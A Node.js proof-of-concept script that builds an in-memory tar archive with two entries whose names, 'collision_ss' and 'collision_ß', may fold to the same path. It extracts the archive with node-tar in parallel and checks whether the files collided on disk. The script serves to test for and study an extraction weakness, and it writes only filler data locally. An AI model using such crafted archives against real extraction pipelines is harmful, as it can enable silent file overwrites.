const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');

const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);

console.log('[*] Testing tar path collision ("collision_ss" vs "collision_ß")...');
console.log(`[*] Extraction target: ${exploitDir}`);

// Construct the archive in memory as a stream of 512-byte tar blocks
const stream = new PassThrough();
const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);

// Entry 1: path "collision_ss"
const header1 = new tar.Header({
  path: 'collision_ss',
  type: 'File',
  mode: 0o644,
  size: contentA.length,
});
header1.encode();

// Entry 2: path "collision_ß" ("ß" upper-cases to "SS")
const header2 = new tar.Header({
  path: 'collision_ß',
  type: 'File',
  mode: 0o644,
  size: contentB.length,
});
header2.encode();

// Write both entries: header block, body, padding to the next 512-byte boundary
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512)));
stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512)));

// End-of-archive marker: two zero-filled 512-byte blocks
stream.write(Buffer.alloc(1024));
stream.end();

// Extract
const extract = new tar.Unpack({
  cwd: exploitDir,
  // Ensure jobs is high enough to allow parallel processing if locks fail
  jobs: 8,
});

stream.pipe(extract);

extract.on('end', () => {
  console.log('[*] Extraction complete');

  // Inspect what actually landed on disk
  const files = fs.readdirSync(exploitDir);
  console.log('[*] Files in exploit dir:', files);
  files.forEach(f => {
    const p = path.join(exploitDir, f);
    const stat = fs.statSync(p);
    const content = fs.readFileSync(p, 'utf8');
    console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
  });

  // A single surviving file, or two directory entries backed by the same inode,
  // means the two archive entries collided on disk.
  const collided =
    files.length === 1 ||
    (files.length === 2 &&
      fs.statSync(path.join(exploitDir, files[0])).ino ===
        fs.statSync(path.join(exploitDir, files[1])).ino);

  if (collided) {
    console.log('[+] Collision detected');
  } else {
    console.log('[-] No collision');
  }
});
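
// --- Background check (hedged): why these two names might collide ---
// Assumption on my part, not confirmed by this script: the test relies on the
// target filesystem (e.g. a case-insensitive macOS or Windows volume) mapping
// "collision_ss" and "collision_ß" to the same on-disk name, while the
// extractor keys its internal path locks on a string that keeps them distinct.
// The standard JavaScript case mappings below only illustrate the Unicode
// asymmetry that makes such a mismatch possible; they say nothing about
// node-tar internals or about any particular filesystem's folding rules.
console.log("'ß'.toUpperCase() ->", JSON.stringify('ß'.toUpperCase())); // "SS"
console.log("'ß'.toLowerCase() ->", JSON.stringify('ß'.toLowerCase())); // "ß"
console.log(
  'upper-cased names equal:',
  'collision_ß'.toUpperCase() === 'collision_ss'.toUpperCase() // true
);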